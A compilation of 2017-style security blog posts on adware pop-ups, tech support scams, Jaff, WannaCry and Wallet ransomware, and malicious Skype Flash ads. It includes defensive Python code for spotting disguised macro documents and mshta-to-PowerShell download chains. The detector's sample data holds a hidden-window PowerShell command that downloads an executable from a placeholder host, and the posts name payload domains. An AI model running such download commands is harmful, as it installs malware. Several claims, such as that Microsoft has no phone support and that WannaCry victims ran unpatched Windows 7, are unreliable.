Marketing platform comes to life again: ads are looking for new victims

If you have run into a website with a ridiculously long URL whose domain name starts with, you are likely to see a congratulatory alert. It might come from a supposed Google Rewards Center or, most recently, a Facebook Reward Center.

Before you hit the ceiling with joy for supposedly having won an iPhone or another valuable product, let us remind you that it is simply a fake alert. Other users may instead encounter alerts urging them to update their browser, Java or Adobe Flash Player.

Advertising intertwines with malvertising

Even though the domain presents itself as Ad Network Performance, it is one of the oldest spam and adware samples. Originally, such alerts merely annoyed users to death, but recent findings suggest that they are shifting towards a newer trend: malvertising.

Given the popularity of social networks such as Twitter and Facebook, you may notice a growing number of websites posing as their affiliates and inviting you to claim free giveaways.

A while ago, another spam campaign spread on Facebook, deceiving users with supposedly free flight tickets. It came as a surprise not only to users but also to the very companies whose names were used.

First, users had to fill in a short survey. Then they were redirected to an affiliate website that required entering private information, such as a phone number or email address. functions the same way. If you disclose any such details on one of the affiliated websites, expect a stream of ads popping up during browsing sessions or cramming your Spam folder.

Another key problem is that this domain is only the tip of the iceberg. There are multiple others:,,,,, etc.

Old tricks along with new strategies

It is surprising that, although such adware and malvertising techniques are quite old and numerous articles have been written on the topic, a high number of users still take the bait. That explains why fraudsters have revived the marketing technique.
Besides this well-known strategy, keep in mind that crooks keep coming up with new and surprising techniques.

Criminals have developed a way to foist malware on users without needing a click on a corrupted link or file: hovering over it is enough. However elaborate spam techniques become, caution remains the best defence against such schemes.

The name of Zeus Trojan is widely used by scammers

Tech support scammers send fake alerts about Zeus infection

Zeus is one of the oldest banking Trojans; it started its career in July 2007 and has since affected hundreds of thousands of companies, banks and governmental institutions. Although its original operators ended their career in 2011, their followers continued spreading new variants of the Trojan.

Meanwhile, scammers lacking imagination or creativity have borrowed the Trojan’s name for their own illegal projects. The name of the banking Trojan is now widely used in various technical support scams.

Undoubtedly, the purpose of such scams is to scare people and make them call a fake tech support line where “certified technicians” offer to clean the virus from the computer.

Examples of tech support scams

Getting infected with Zeus is a terrifying experience. Scammers are aware of human psychology and of the fear of catching computer infections, so the name of the notorious banking Trojan serves to commit yet another cyber crime.

Such scams usually deliver messages in the browser’s window, such as “Windows Defender Alert: Zeus Virus”, “Windows Detected ZEUS Virus” or “You Have A ZEUS Virus.” All these fake alerts state the same thing: your computer is infected, call the provided number.

However, none of these messages are true. Only the antivirus program installed on your PC can inform you about a malware attack, and it does so in its own notification window, not in the browser.

All other alerts that appear in the browser are fake and most probably created by cyber criminals who want to take control of your computer, obtain your personal information or sell you useless software.

Signs of the real Zeus attack

If you ever land on a website that claims a dangerous banking Trojan resides on your system, do not take any spontaneous action. Above all, do not grab your phone to call the provided number.

As we have already mentioned, such online security alerts are fake. What is more, crooks usually introduce themselves as Microsoft technicians. However, Microsoft does not have a phone support line, so that is the main sign that you are being scammed.

A real Zeus attack is accompanied by slow computer performance, disabled security software, unknown system errors, an increased amount of aggressive online ads and, of course, suspicious financial transactions or even an emptied bank account.

We want to remind you that as soon as you suspect your computer is infected, you should run a full system scan with an updated security tool.

Good news for victims of Jaff ransomware: free decryptor is already available

As the Virus Activity blog reports, there’s no need to worry about Jaff ransomware anymore. This recently emerged cyber threat is already decryptable.

This ransomware was spotted spreading via the Necurs botnet at the end of spring 2017. Crooks sent numerous malicious spam emails that included an obfuscated PDF attachment. These files were named to look like copies, scans, invoices and the like. Apparently, too many users believe that such documents cannot harm their computer.

Unfortunately, these naïve assumptions were wrong. The safe-looking PDF file was actually a DOCM document. This macro-enabled document asked the user to click the “Enable Content” button, and clicking it led to the installation of the ransomware.
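As an added example (not part of the original post and not anyone’s decryptor), the following Python checks an email attachment by its content rather than its extension: it flags a macro-enabled DOCM that has been renamed to .pdf, and also a file with a genuine PDF header that wraps an uncompressed macro-enabled document. `build_docm` is an assumed helper that constructs a minimal stand-in for a Word file so the check can run offline.

```python
import io
import re
import zipfile

# Standard container signatures. The sample attachments built below are
# constructed in memory for this example; they are not real Jaff files.
PDF_MAGIC = b"%PDF-"
ZIP_MAGIC = b"PK\x03\x04"
VBA_PROJECT = "word/vbaProject.bin"  # only present in macro-enabled Word files
OOXML_EXTENSIONS = {"docx", "docm", "dotm", "xlsx", "xlsm", "pptx", "pptm"}
MACRO_EXTENSIONS = {"docm", "dotm", "xlsm", "pptm"}


def has_vba_project(blob: bytes) -> bool:
    """True if blob is a ZIP container carrying a VBA macro project."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return VBA_PROJECT in zf.namelist()
    except zipfile.BadZipFile:
        return False


def inspect_attachment(name: str, data: bytes) -> dict:
    """Classify an attachment by its content rather than by its file name."""
    claimed = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if data.startswith(PDF_MAGIC):
        real = "pdf"
    elif data.startswith(ZIP_MAGIC):
        real = "ooxml"  # DOCX/DOCM/XLSX/... are all ZIP containers
    else:
        real = "unknown"

    macro = real == "ooxml" and has_vba_project(data)
    # A genuine PDF header may still wrap an uncompressed OOXML blob, so
    # try every ZIP signature found inside the file. (Compressed PDF
    # streams would need a real PDF parser and are out of scope here.)
    if real == "pdf" and not macro:
        for m in re.finditer(re.escape(ZIP_MAGIC), data):
            if has_vba_project(data[m.start():]):
                macro = True
                break

    if macro:
        verdict = "macro-enabled Office document"
        if claimed not in MACRO_EXTENSIONS:
            verdict += " disguised as ." + claimed
    elif (real == "pdf" and claimed != "pdf") or (
            real == "ooxml" and claimed not in OOXML_EXTENSIONS):
        verdict = "extension does not match content"
    else:
        verdict = "consistent"
    return {"claimed": claimed, "real": real, "macro": macro, "verdict": verdict}


def build_docm(with_macro: bool) -> bytes:
    """Constructed minimal OOXML-style ZIP (not a real Word document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr(VBA_PROJECT, b"\xd0\xcf\x11\xe0 constructed stub")
    return buf.getvalue()
```

For instance, `inspect_attachment("invoice.pdf", build_docm(True))["verdict"]` returns "macro-enabled Office document disguised as .pdf", which is exactly the lure described above.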

During its rather short lifetime, the malware was updated several times. Different versions of the virus marked encrypted files with the .jaff, .wlu and .sVn extensions, which made them impossible to open.

However, a malware researcher from Kaspersky Lab found a flaw in the ransomware’s code. This discovery made it possible to create decryption software that unlocks encrypted files for free. Meanwhile, the virus’s developers offered their questionable decryptor for 1.82-2 Bitcoins.

Victims were never encouraged to do business with cyber criminals, but a desperate need for their files may have led thousands of people to pay the ransom. Fortunately, obtaining a decryption key from the hackers is no longer necessary. Free and secure decryption software can be downloaded from here.

Although data recovery seems the most important task after a ransomware attack, that is not quite true. Before taking advantage of the newly created decryptor, you have to make sure that Jaff malware is no longer on your computer.

While the crypto-malware resides on the system, any attempt to recover your files might fail, because the virus can simply encrypt the decrypted files again. It goes without saying that a malicious program running on your computer also makes the system vulnerable and easily accessible to other cyber threats. Thus, first of all, you have to focus on virus removal.

For ransomware elimination, you will need to use a professional malware removal program and run a full system scan. However, this ransomware is designed to resist simple deletion from the system, so you may need to take extra steps before running security software. In that case, the Jaff removal instructions on 2-spyware will come in handy.

May 2017: WannaCry causes the most headaches

Nearly a month has passed since the first reports about WannaCry ransomware started flooding the Internet, and those were definitely some intense weeks. Home users, businesses and even major organizations such as hospitals or telecommunication services have been losing large quantities of data and money to this parasite. Some had to suspend or limit their daily operations because of the attacks. For now, the initial wave of WCry attacks seems to have ceased, so we can look back on it in a more structured manner and highlight the things that have caused the most headaches to the online community.

For a large part of May, after the virus showed up, WCry peaked rapidly, infecting thousands of devices a day. Reports about newly targeted countries emerged daily, causing panic across the world. Over the span of a month, the malware managed to infect over 400,000 machines, making history as the biggest ransomware attack to date. The virus would probably not have made it this far if not for the ETERNALBLUE exploit, which the hacker group called Shadow Brokers leaked from the NSA’s secret servers earlier in April. The exploit specifically targets the MS17-010 vulnerability found in Windows operating systems. In particular, 98 percent of the affected machines were outdated Windows 7 versions which no longer receive security patches from Microsoft. This security hole remains a major threat for users who are running expired software or have not updated Windows 10 to the latest version. Undoubtedly, ransomware will thrive as long as criminals are able to take advantage of such vulnerabilities.

Even though security experts managed to come up with a kill switch and a decryptor that partially immobilized WannaCry, the virus’s success has sparked a new wave of interest in ransomware development. Experts say that spin-off versions such as XData or WannaCry 2.0 are just the beginning and that the grim legacy of this nasty cyber infection will continue in the future. Thus, it is important to brace ourselves for potential attacks, protect our devices with professional security software, regularly look for system updates and keep backups.

Things to consider before installing Amazon Assistant

is one of those sites where you can find almost everything you need. Undoubtedly, it’s easy to get lost in the variety of products while looking for the best deal. In order to help users, the company created the Amazon Assistant browser extension. However, if you are an online shopping lover, do not get excited yet. Security experts had concerns about this tool and categorized it as a potentially unwanted program (PUP). The main reasons include: the ability to sneak into the computer unnoticed, tracking data and sharing it with third parties, displaying an excessive amount of online ads, and a complicated removal procedure. If you are looking for an honest opinion on whether it’s worth installing or not, we can assure you that this add-on should not find a place in your browser’s extension list. Former users even call it the Amazon Assistant virus.

Before installing any new program, it’s important to read the Privacy Policy. This document reveals how much information the application collects and how it treats the aggregated data. Amazon Assistant does not mind sharing details about you with third parties. Undoubtedly, this information will be used for advertising purposes, and soon you will see lots of ads when browsing the web. That is disturbing and annoying, but it might be dangerous too. Some of the ads might deliver fake Amazon deals and redirect you to suspicious websites where you can get infected with computer viruses. And that may not be the only threat. Once you install this tool, you will receive lots of emails and shopping offers. Undoubtedly, they might be useful, but the problem is that cyber criminals send identical-looking emails; the only difference is that theirs are infected. For several years, cyber criminals have been sending emails about order updates, shipping problems and similar issues. Crooks use thousands of different emails to spread various versions of the so-called Order update virus.

The last problem related to Amazon Assistant is its complicated removal procedure. It does not matter whether users installed it directly from the website or it sneaked in with a software bundle: plenty of people complain that they are unable to get rid of it. Some say that the program has no “Uninstall” option, and others claim that it is magically reinstalled on the computer again and again. Thus, if we have convinced you to get rid of this program, or you are dealing with uninstallation problems, you might find these Amazon Assistant removal instructions handy. And if you are one of those people who are still considering installing it, bear in mind that you will need to work hard to remove it if the extension does not meet your expectations.

North Korean hacker group suspected of being behind the recent WannaCry cyber attack

The infamous ransomware known as WannaCry has infected a quarter of a million computers worldwide, and the sheer number of headlines about it probably makes the authors of Locky and Cerber feel disappointed. There is no doubt that this critical ransomware, which used the EternalBlue exploit to attack computer systems, has attracted much media attention. A quick reaction from malware researchers helped to find a kill switch that inactivates the virus; however, security experts now warn about WannaCry 2.0, which has no kill switch. Moreover, malware analysts have recently come up with some very suspicious technical details about this virus, raising suspicions that North Korea could be the one to blame for the attack.

The dramatic discovery was made by Google security researcher Neel Mehta. He claims that some lines of WannaCry’s source code match code from malicious software called “Contopee” that was used by a North Korean hacker group known as “Lazarus.” The group was accused of hacking Sony Pictures back in 2014 and of stealing a six-figure sum from the Bangladesh bank in 2016. However, it is only a small observation, which does not prove anything yet. It is a well-known fact that developers of legitimate and malicious programs alike copy pieces of code from software that is already available. According to security researcher Matt Suiche, “if validated, this means the latest iteration of WannaCry would, in fact, be the first nation state powered ransomware.” At the moment, it is too early to form any conclusions, and further analysis is clearly required. It is natural that people are looking for the culprits of such a massive cyber attack, but for now computer users should focus on methods to protect their computers. The eSolutions team highly recommends these tips on how to survive the WannaCrypt attack.

Files encrypted by Wallet ransomware might be decrypted

Wallet ransomware has been attacking computer users for a while now. The malware has been updated several times and, together with its variants, has encrypted hundreds of thousands of files using a combination of the AES and RSA ciphers. Although the cyber criminals claim that only they can decrypt the corrupted data, that is not true. If you got infected with this ransomware, do not listen to the lies written in the ransom note, and do not contact the cyber criminals via the provided email address. Research has shown that this crypto-malware is just another version of Dharma ransomware, and it’s no secret that Dharma is decryptable. Thus, victims of Wallet ransomware can easily restore their files using the Rakhni Decryptor created by Kaspersky Lab. However, if your files are marked with the .wallet extension, do not get excited yet. First of all, you need to get rid of the parasite; only then is it safe to decrypt your files.

Cyber criminals use clever social engineering techniques and spread the Wallet payload via malicious spam emails. Such emails might look as if they were sent by banks, financial organizations, well-known companies, online shops and even governmental institutions, so it’s easy to get tricked into opening an obfuscated email attachment. Once you make such a mistake, you launch the installation and execution of the ransomware. Immediately, all your files receive the [hackers’ email address].wallet or [hackers’ email address].wallet.lock extension, and you are asked to contact the criminals via one of a dozen email addresses. Instead, focus on Wallet removal and clean your computer of this cyber parasite. All the necessary information about virus elimination can be found here. When you complete this unpleasant task, you can download the decryption software from here and get back all your important files for free. As you can see, paying the ransom is not an option!

Small and medium size businesses have become the main targets of ransomware

Recently, security experts reported a new tendency: small and medium-sized businesses have become the main targets of ransomware authors. The explanation is simple. Scammers are aware that employees are curious creatures who can hardly resist the temptation to look at an attachment sent to them by an unknown sender. Besides, they know that after using the virus to encrypt the entire network of a company they can make more money: owners of small and medium-sized businesses are much more vulnerable than home users, so they are ready to pay larger sums. However, you should NEVER consider paying a ransom to cyber criminals, because you can be left with no money and no files.

Last month was especially active for hackers trying to mislead random companies and infect them with Spora, BTC ransomware and many others. To make employees open an infected attachment and/or extract the attached file, they have set up a bunch of spam campaigns using subject lines such as Office, Support, Sales, Cleints, Credit Control, Customer Support, etc. Beware that such emails are usually filled with the names, telephone numbers and addresses of real companies and people, so you can easily find them on Google. However, those people have no idea that someone has started using their names and similar information to mislead users and infect them with malware. Before opening an attachment, you should try to contact the sender first. Also, enable Protected View and disable macros on your and your colleagues’ computers to protect yourselves from social engineering.

Fake Flash Player ads on Skype push malware to users

According to several users’ complaints that recently appeared on Reddit and Twitter, the official Skype application pushed malicious Adobe Flash Player ads to users. It appears that users received the malicious ad right after logging into their Skype accounts, and it suggested installing a FlashPlayer.hta file. What happens next may shock you. If the user agrees to install it, thinking that legitimate software like Skype is suggesting a required piece of software or an update, the malicious JavaScript code inserted into the .hta file runs a PowerShell script, which connects to a website that hosts malware and downloads it from there. The currently known domains that hosted the final payload were oyomakaomojiya(.)org and cievubeataporn(.)net. However, both domains were taken down quickly; therefore, malware analysts were not able to reach them and download a sample of the malware.
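As an added, defender-side illustration that is not code from the report or from Skype: the chain described above (an .hta file handed to mshta.exe, which then spawns PowerShell to fetch a payload from the web) shows up clearly in process-creation telemetry. The event field names and every event below are assumptions constructed for this example; the domain is a reserved placeholder.

```python
import re
from pathlib import PureWindowsPath

# Process-creation events in the shape an EDR/Sysmon pipeline might emit.
# The field names are an assumption for this example, and every event is
# constructed; none of them comes from the Skype incident itself.
EVENTS = [
    {"ts": "2017-05-05T10:02:11Z",
     "parent": r"C:\Program Files\Skype\Phone\Skype.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\FlashPlayer.hta"'},
    {"ts": "2017-05-05T10:02:12Z",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/u','C:\Users\alice\AppData\Local\Temp\u.exe')"},
    {"ts": "2017-05-05T10:30:00Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ts": "2017-05-05T11:00:00Z",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Substrings that indicate PowerShell is fetching something from the web.
DOWNLOAD_MARKERS = ("net.webclient", "downloadfile", "downloadstring",
                    "invoke-webrequest", "start-bitstransfer", "http://", "https://")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_event(ev: dict) -> list:
    """Reasons why this event matches the HTA -> PowerShell download chain."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    cmd = ev["cmdline"].lower()
    reasons = []
    if image == "mshta.exe" and ".hta" in cmd and any(d in cmd for d in USER_WRITABLE):
        reasons.append("mshta.exe running an .hta file from a user-writable folder")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(image + " spawned by mshta.exe")
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            reasons.append("command line contains a download primitive")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd):
            reasons.append("hidden window requested")
    return reasons


def find_suspicious(events: list) -> list:
    """(timestamp, reasons) for every event that triggered at least one rule."""
    return [(ev["ts"], score_event(ev)) for ev in events if score_event(ev)]


if __name__ == "__main__":
    for ts, reasons in find_suspicious(EVENTS):
        print(ts, "|", "; ".join(reasons))
```

The two Skype events fire (the second on all three rules), while the scheduled backup script and the harmless mshta child do not, which is the distinction a triage rule needs to make.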

Researchers also discovered that both domains were registered using email accounts that had been used to set up numerous questionable websites, and the IP addresses hosting some of them led to servers that hosted even more infectious websites. Reportedly, these sites were used for malware distribution and helped to propagate malicious JavaScript files. If you did not know this yet, such files can deliver ransomware, Trojans or other malicious programs right into your computer system.

It goes without saying that the attack against Skype users was carried out by a well-organized cyber crime gang. It seems that this group continuously registers new domains and shuts down old ones daily, trying to keep malware researchers away from the samples it pushes to victims. Although no more malicious ads were spotted in the following days, we recommend being careful and staying away from any suspicious ads that might appear on Skype. Make sure your anti-malware software is running, and if you want to be aware of the tricks scammers use to attack Skype users, read this article about Skype viruses. Recently, a large number of users complained about a suspicious virus that hijacks their accounts and sends odd hyperlinks to all their contacts.

Improving your company’s security

Business brings people together to tackle different challenges. However, when people are working on improving their company’s financial growth and similar indicators, they usually forget about security. That is a shame, because nowadays there are various risks facing the entire company, its clients and its employees. What could be done to improve the security level of your organization? Here are the main things to take care of:

  1. Educate your employees about Internet malware and its capabilities. Make sure you let your coworkers know about the latest viruses spreading on the Internet and their distribution techniques. Each of your employees should know the latest techniques used by ransomware, adware, tech support scam viruses and similar malware that can easily put your business in danger.
  2. Ask your colleagues to start using strong passwords and help them understand that business security is different from personal security. When using their business profiles, they should forget about “12345”, “password” and similar passwords that are not secure.
  3. Let your people know about the danger of outdated software. Almost every business uses devices such as PCs, routers, printers and internal servers. Make sure that they are kept up to date so that they can perform at their best. It goes without saying that you need to update your anti-virus software daily to prevent infiltration by the latest viruses. If automatic updates are disabled, you should assign someone to apply updates manually to prevent vulnerabilities in your business devices.
  4. Look for alternatives to cloud computing. Even though companies have been widely switching to the cloud to store their sensitive data, security experts do not recommend keeping intellectual property there. Think about the dangers that arise after a cloud service is breached: hackers can easily try to get access to your company’s sensitive data.